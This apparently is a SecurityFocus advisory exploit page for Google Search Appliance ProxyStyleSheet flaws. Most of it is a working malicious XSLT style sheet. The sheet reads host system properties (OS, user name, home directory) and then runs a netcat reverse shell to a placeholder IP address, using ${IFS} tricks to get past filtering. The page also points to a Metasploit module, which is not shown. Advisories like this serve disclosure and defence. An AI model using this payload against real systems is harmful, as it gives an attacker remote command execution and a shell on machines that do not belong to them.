Google Search Appliance ProxyStyleSheet Multiple Remote Vulnerabilities

An exploit is not required to leverage these issues. An example style sheet sufficient to execute commands has been provided:

<xsl:template
name="my_page_footer"
xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime"
>

<!-- Google Mini XSLT Code Execution [metasploit] -->

XSLT Version: <xsl:value-of select="system-property('xsl:version')"/> <br />
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> <br />
OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br />
Version: <xsl:value-of select="sys:getProperty('os.version')" /> <br />
Arch: <xsl:value-of select="sys:getProperty('os.arch')" /> <br />
UserName: <xsl:value-of select="sys:getProperty('user.name')" /> <br />
UserHome: <xsl:value-of select="sys:getProperty('user.home')" /> <br />
UserDir: <xsl:value-of select="sys:getProperty('user.dir')" /> <br />

Executing command...<br />
<xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" />
</span>
</xsl:template>

An exploit for the Metasploit Framework is also available:


 

Privacy Statement
Copyright 2010, SecurityFocus